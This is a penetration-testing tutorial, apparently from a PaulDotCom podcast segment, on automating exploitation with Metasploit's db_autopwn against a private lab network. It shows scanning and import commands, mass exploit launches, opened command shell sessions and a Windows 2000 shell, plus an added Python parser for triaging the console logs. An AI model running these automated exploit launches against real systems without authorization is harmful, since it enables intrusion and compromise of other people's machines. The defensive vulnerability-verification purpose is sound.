Metasploit

From PaulDotCom episode 124:

Tech Segment: Automating Exploitation With Metasploit's db_autopwn

There is tremendous value in identifying vulnerabilities in your network, whether from the outside looking in, or the inside looking out. I like to try to automate this process as best I can, then use manual methods to further verify my work. For example, let's say I want to quickly verify the results from an Nmap or Nessus scan, and see if any of the Windows hosts are vulnerable to common Microsoft exploits. I can use Metasploit to do this, as it will test for the common remotely exploitable Windows vulnerabilities.

The first step is to set up Metasploit with a database module and create a database:

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create mynetwork
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: mynetwork 
msf >
From here, I have many options. I can import Nmap results from a previous scan using its XML output (-oX):

msf > db_import_nmap_xml mynetwork.xml

Using the db_nmap module I can run Nmap directly from Metasploit and populate the database:

msf > db_nmap -sS -T4 -O 192.168.1.0/24
[*] exec: "/usr/local/bin/nmap" "-sS" "-T4" "-O" "192.168.1.0/24" "-oX" "/tmp/dbnmap.29736.0"
NMAP: 
NMAP: Starting Nmap 4.76 ( http://nmap.org ) at 2008-09-25 09:05 EDT

I can now launch exploits against known targets, but only by open port (since we ran Nmap, which only collected open-port information):

msf > db_autopwn -p -e

-p selects exploit modules by the open ports recorded for each host, and -e actually launches them (the "exploit" command). When I do this, I give Metasploit a lot of work to do:
<snip>
[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80... [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Started bind handler
[*] Trying target BadBlue 2.72b Universal...
[*] Server may not be vulnerable.
[*] Calling the vulnerable function...
[*] Successfully removed /config/password.txt
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80... 
[*] Started bind handler
<snip>
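With 727 launches scrolling past, the useful signal is which hosts actually ended up with a session and which attempts failed. The following Python is an added example, not code from the episode or from Metasploit; it parses the three line shapes seen in the console output above, and its sample input is copied from that transcript.

```python
"""Triage saved db_autopwn console output: which module was launched against
which host, and which hosts ended up with a session worth verifying by hand."""
import re
from collections import defaultdict

# Line shapes as printed by msfconsole in the transcript above.
LAUNCH_RE = re.compile(
    r"\[\*\] Launching (?P<module>exploit/\S+) \(\d+/\d+\) "
    r"against (?P<host>\d+\.\d+\.\d+\.\d+):\d+\.\.\.")
FAIL_RE = re.compile(r"\[-\] Exploit failed: (?P<reason>.+)")
SESSION_RE = re.compile(
    r"\[\*\] Command shell session (?P<sid>\d+) opened "
    r"\(\S+ -> (?P<dst>\d+\.\d+\.\d+\.\d+):\d+\)")

def triage(log_text):
    """Return {host: {"launched": [...], "failed": [...], "sessions": [...]}}.
    Handler output is printed asynchronously, so a failure is attributed to the
    most recently launched module (a hint); session lines name their target."""
    report = defaultdict(lambda: {"launched": [], "failed": [], "sessions": []})
    last_host = last_module = None
    for line in log_text.splitlines():
        # Search every pattern on every line: the transcript shows a failure
        # message run onto the end of a "Launching" line.
        if m := LAUNCH_RE.search(line):
            last_host, last_module = m["host"], m["module"]
            report[last_host]["launched"].append(last_module)
        if (m := FAIL_RE.search(line)) and last_host:
            report[last_host]["failed"].append(last_module)
        if m := SESSION_RE.search(line):
            report[m["dst"]]["sessions"].append(int(m["sid"]))
    return dict(report)

def hosts_with_sessions(report):
    """Hosts where an exploit actually produced a shell: verify these first."""
    return sorted(host for host, r in report.items() if r["sessions"])

# Sample input copied from the transcript above (constructed test data).
SAMPLE_LOG = """\
[*] Launching exploit/netware/smb/lsass_cifs (19/727) against 192.168.1.244:445...
[*] Launching exploit/windows/http/badblue_passthru (20/727) against 192.168.1.52:80... [-] Exploit failed: The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.204:58664 -> 192.168.1.52:34657)
[*] Launching exploit/windows/iis/ms01_023_printer (22/727) against 192.168.1.226:80...
"""

if __name__ == "__main__":
    for host, r in triage(SAMPLE_LOG).items():
        print(host, len(r["launched"]), "launched", len(r["failed"]), "failed", r["sessions"])
```

Run it against a console log saved with msfconsole's spool command (or a copied terminal buffer) to get a per-host summary instead of reading every launch line.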
727 possible exploit vectors! That took a while. So, I decided to run Nessus against my network, then import the Nessus results:

msf > db_import_nessus_nbe windows.nbe

Now I run db_autopwn and tell it (-x) to select modules based on the vulnerability references Nessus reported:

msf > db_autopwn -x -e

This produces much better results:

msf > sessions -l

Active sessions
===============

    Id    Description     Tunnel
    --    -----------     ------
    1     Command shell   192.168.1.204:60530 -> 192.168.1.52:37541
    2     Command shell   192.168.1.204:61047 -> 192.168.1.52:13917
    3     Command shell   192.168.1.204:61306 -> 192.168.1.52:6112
    4     Command shell   192.168.1.204:61350 -> 192.168.1.52:5646

msf > sessions -i 2 
[*] Starting interaction with 2... 

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>